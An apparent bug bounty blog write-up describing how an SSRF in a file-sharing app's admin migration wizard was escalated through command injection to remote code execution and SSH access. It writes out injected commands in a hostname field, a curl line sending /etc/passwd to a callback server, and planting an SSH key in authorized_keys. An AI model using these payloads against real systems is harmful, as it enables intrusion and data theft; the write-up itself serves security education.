Bug bounty write-up: From SSRF to $4000
Hello ethical hackers and bug bounty hunters! Welcome to this bug bounty write-up where I show you how I found a Server-Side Request Forgery vulnerability (SSRF). Then, I will explain how I was able to escalate it to obtain a Remote Code Execution (RCE). Finally, you will see how it is possible to gain a full SSH shell on the vulnerable server.
If all this seems intimidating for you, let me tell you that you shouldn’t be; just make sure you stick with me until the end. I promise you are going to learn many things today!
What app is this bug bounty write-up targeting?
Before diving into the details, let’s understand what the application does.
Simply put, the web application I hacked is a file-sharing system that allows users to securely exchange files. It also has an administrative panel dedicated to the administrators for management purposes. They can create users, configure internal servers and networks, etc.
To honour the responsible disclosure policy, I will not tell the name of this application. However, this does not affect what you will be learning. You can definitely apply these tips and tricks on the bug bounty programs or the penetration testing projects you are working on.
Bug bounty write-up phase 1: Enumeration
The first phase of any security testing is Enumeration. In my bug bounty methodology, I explained what are the key questions you need to answer during this phase.
In the context of this application, I focused on the administration panel since it contained many interesting features. One of them is the possibility to configure a migration server. This feature has a multi-stage wizard.
Whenever I see a complex feature, I tend to put it at the top of the list since the developers will likely make more mistakes. And this particular case was no different!
In fact, during one of the many configuration steps, the application asks for the IP address or the hostname of the migration server. For me, I started hearing inner-voices screaming: SSRF! SSRF! SSRF!
Bug bounty write-up phase 2: Exploiting the SSRF
Wait…What is SSRF in the first place?
SSRF stands for Server-Side Request Forgery. It is a security vulnerability which happens if you can meet two conditions:
- The application initiates a request to a target server.
- You control part or all of the target server through user input.
SSRF can be handy to pivot inside the IT infrastructure of your target. This is possible because the vulnerable server generally runs next to neighbour systems which are not directly accessible. You can see this in action when I demonstrate how I accessed the APK file during the Hackerone H1-2006 CTF challenge write-up.
Exploiting the SSRF
In the case of this web application, I simply put my web server’s hostname in the migration server’s input field. Upon hitting the Next button, I received an HTTP callback. This means that the application takes the hostname input and initiates an HTTP request to a server of my choice.
What is the impact?
Receiving a callback is not necessarily a security issue unless the server discloses sensitive data in the request. You must test if you can reach internal assets. In other words, you should be able to access services which are not directly exposed. Unfortunately, many bug bounty hunters fall for this mistake and their reports get closed as Not Applicable to Informative.
In the case of this web application, I get different error messages depending on whether there is a service running or not, but that’s all about it! I can’t interact with those services. Therefore, this SSRF is not impactful enough.
But wait! Maybe I can run arbitrary commands and exfiltrate the results in the callback.
Escalating to Remote Code Execution (RCE)
This time, instead of using my domain as a callback, I injected an operating system (OS) command as part of the callback subdomain. Technically, I used the payload “whoami.mycallback.server. Consequently, I got an HTTP request callback to uzer.mycallback.server !
If you don’t understand the above payload, here is what’s happening:
- The whoami runs the command whoami. This is possible thanks to the back-ticks around it. In this case, the command returns uzer .
- The server sends an HTTP callback request to my server while disclosing the result of the OS command in the subdomain part.
This is clear proof that I can successfully run OS commands on the vulnerable server, which is all good, but can I run arbitrary commands?
Bug bounty write-up bonus: Getting a full shell
While the proof-of-concept (POC) that I have so far demonstrates impact, I wanted to be sure I’m getting the full bug bounty. To do that, I needed to prove that I can run arbitrary commands, not just single-word commands like whoami.
To achieve this, I needed to read and write files. You will understand why shortly, but for now, let’s see how we can fulfil those two requirements.
Reading internal files
Instead of using whomai, I run curl -F ‘@/etc/passwd mycallback.server’.mycallback.server. Therefore, I exfiltrated the content of the file /etc/passwd in the POST data which I receive back on mycallback.server.
Although I was using a mal-formatted hostname syntax in my payload, I still could run the OS command since the server evaluates it before anything else.
Writing to internal files
To demonstrate the ability to create and edit the server’s files, I run echo test | tee /tmp/POC. Then, I fetched its content using the same technique I used to read the /etc/passwd file.
Finally, getting the SSH shell
Because the server is running a publicly accessible SSH server, what if I could log into it without any need for a password?
To achieve this, the steps are as follow:
- Generate a key pair using the command ssh-keygen on my attacking machine.
- Append the public key to the file /home/uzer/.ssh/authorized_keys on the vulnerable server using the same technique I used earlier to write the file /tmp/POC.
- Log into the SSH server using my private key and the user uzer using ssh -i private.key uzer@vulnerable.server .
As a result of this clear and precise impact, the team quickly triaged my report and awarded me with the highest bounty.
Conclusion
Chaining vulnerabilities can be devastating. In this bug bounty write-up, you learned how to combine both SSRF and Command injection to achieve Remote Code Execution on the vulnerable server. Besides, you learned how to gain a stable shell by leveraging the exposed SSH server. Finally, you learned that it’s important to demonstrate a clear impact if you want to receive the highest bounty.
I hope you enjoyed reading this article as much as I enjoyed writing it. Until the next episode, stay curious, keep learning and go find some bugs.